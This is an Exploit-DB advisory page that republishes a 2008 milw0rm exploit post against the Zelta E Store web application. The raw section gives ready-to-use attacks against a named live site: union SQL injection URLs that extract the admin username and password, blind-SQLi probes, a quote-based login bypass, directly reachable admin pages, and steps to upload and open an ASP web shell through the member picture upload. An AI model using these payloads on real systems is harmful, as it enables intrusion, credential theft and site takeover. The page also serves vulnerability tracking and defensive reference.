Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns

vendor:

Zelta E Store

by:

ZoRLu

8.8

CVSS

HIGH

Remote File Upload/Bypass/R-SQL/B-SQL

89, 89, 89, 89

CWE

Product Name: Zelta E Store

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns

Zelta E Store is prone to multiple remote vulnerabilities, including remote file upload, authentication bypass, R-SQL and B-SQL injection. An attacker can exploit these issues to upload arbitrary files to the affected computer, bypass authentication, execute arbitrary SQL commands, and gain access to sensitive information. This may lead to further attacks.

Mitigation:

Users should apply the latest patches and updates provided by the vendor. Additionally, users should implement proper input validation and sanitization to prevent malicious input from entering the system.

Source

Exploit-DB raw data:

[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns. 
[~]
[~] script: http://www.zeltatrade.com/
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Date: 16/12/2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo 
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------

exp for demo: (R-SQL)

user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin

pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin


exp for demo: (B-SQL)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)


exp for demo: (auth bypass)

http://joineazy.com/members/login.asp

username: trt-turk@hotmail.com

pass: ' or '


exp for demo: (admin bypass)

http://joineazy.com/embadmin/admin_main.asp

http://joineazy.com/embadmin/site_setup.asp

http://joineazy.com/embadmin/main_baseimage.asp


exp for demo: (RFU)

firs you register to site

login to site and edit your pictures select your shell.asp

go your shell asp:

http://joineazy.com/members/member_pictures/shell.asp

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-12-16]